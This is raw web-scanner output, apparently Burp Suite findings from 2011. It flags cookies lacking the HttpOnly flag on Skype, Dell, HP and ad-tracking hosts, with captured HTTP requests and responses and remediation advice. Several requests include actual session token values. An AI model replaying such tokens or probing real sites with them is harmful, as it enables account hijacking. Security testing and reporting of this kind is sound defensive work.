The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3 Host: login.skype.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.headsets HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.phones HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.webcams HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.extras HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/skype.manager.setup HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/tvwebcams HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily Date: Sun, 04 Sep 2011 21:13:41 GMT P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA" Set-Cookie: 33x_ps=u%3D8939182109%3As1%3D1314119008217%3Ats%3D1314119008217; Domain=.33across.com; Expires=Mon, 03-Sep-2012 21:13:41 GMT; Path=/ Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8939182109&seg=150349&seg_code=33x&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26id%3D1211914&random=918826 Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Cache-Control: private,max-age=0 Date: Sun, 04 Sep 2011 16:20:00 GMT Content-Type: text/html; charset=utf-8 Expires: Wed, 01 Jan 1997 12:00:00 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=7 P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:20:00 GMT; path=/ Vary: Accept-Encoding Content-Length: 68855
// menu definition for c=us&l=en&s=bsd&cs=04 // var m_0_0_Menu = new Array( new menuItem( "Laptops", "http://www.dell.com/p/vostro-laptop-deals.aspx?c=us&cs=04&l=en&s=bsd" ), new menuItem( "Desktops ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Cache-Control: private,max-age=0 Date: Sun, 04 Sep 2011 16:19:59 GMT Content-Type: text/html; charset=utf-8 Expires: Wed, 01 Jan 1997 12:00:00 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=7 P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/ Set-Cookie: dellsearch=srchb=control&rpp=12; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/ Set-Cookie: StormSCookie=bandwidth=NA; domain=.dell.com; path=/ Vary: Accept-Encoding Content-Length: 90930
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>xss - ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://community.skype.com/t5/help/faqpage/faq-category-id/posting Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rd?cid=901pdb6671&mid=901qz26673&mkwid=s1CStlI5S&pcrid=13885348293&pkw=application%20security%20web&pmt=b&lp=http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0?kw=application%20security%20web&mpre=http%3A%2F%2Flt%2Edell%2Ecom%2Flt%2Flt%2Easpx%3FCID%3D64824%26LID%3D1652027%26DGC%3DST%26DGSeg%3DBSD%26DURL%3Dhttp%253A%252F%252Fcontent%252Edell%252Ecom%252Fus%252Fen%252Fbusiness%252Fsecurity%252Dnetwork%252Easpx%3Fst%3Dapplication%20security%20web%26ACD%3Ds1CStlI5S,13885348293,901qz26673 HTTP/1.1 Host: tracker.marinsm.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/help HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: ui.skype.com Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:03:33 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170213:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:03:33 GMT; path=/; domain=.skype.com; Location: https://support.skype.com/ Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/upgrade HTTP/1.1 User-Agent: Skype Upgrade Host: ui.skype.com
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:04:44 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315170284:TS=1315170284:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:04:44 GMT; path=/; domain=.skype.com; Location: http://download.skype.com/SkypeSetupFull.exe Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/upgraded HTTP/1.1 User-Agent: Skype. 5.5 Host: ui.skype.com Pragma: no-cache
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 17:58:15 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315159095:TS=1315159095:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 17:58:15 GMT; path=/; domain=.skype.com; Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/apps HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: ui.skype.com Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:08:54 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:08:54 GMT; path=/; domain=.skype.com; Location: http://www.skype.com/go/apps Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/prices HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: ui.skype.com Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:14:10 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:14:10 GMT; path=/; domain=.skype.com; Location: http://www.skype.com/go/prices Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/share HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: ui.skype.com Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:13:37 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:13:37 GMT; path=/; domain=.skype.com; Location: http://www.skype.com/go/share?SkypeName=&FriendEmailAddr_1=&FriendEmailAddr_2=&FriendEmailAddr_3=&FriendEmailAddr_4=&FriendEmailAddr_5=&FriendEmailAddr_6=&FriendName_1=&FriendName_2=&FriendName_3=&FriendName_4=&FriendName_5=&FriendName_6= Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/subscriptions?country= HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: ui.skype.com Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:27:02 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:E70B9EF1770AF398=:LC=en-us:TM=1315171622:TS=1315171562:TZ=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:27:02 GMT; path=/; domain=.skype.com; Location: http://www.skype.com/go/subscriptions?cm_mmc=Skype-_-Dynamic_Content-_-Subscriptions-_-Generic4 Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=76c8d7f07f77d55df225a1ee0abb; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookies were issued by the application and do not have the HttpOnly flag set:
PHPSESSID=mgd0vgc60sr4gk9t1ql92arlu3; path=/
server=www18; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cda/gap/display/main/index.jsp HTTP/1.1 Host: h10088.www1.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campus/p/campusId/10640/Graphic_arts.htm HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /howto_QL_courses.jsp?contentType=How-to+in+2&mcid=explore-create HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.jsp HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0 Host: login.skype.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jspix?anId=144&pubId=19240&campId=161441 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B600F18284A9B6B8956E4E27118E3C99; Path=/ Content-Type: text/javascript Date: Mon, 05 Sep 2011 02:30:54 GMT Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
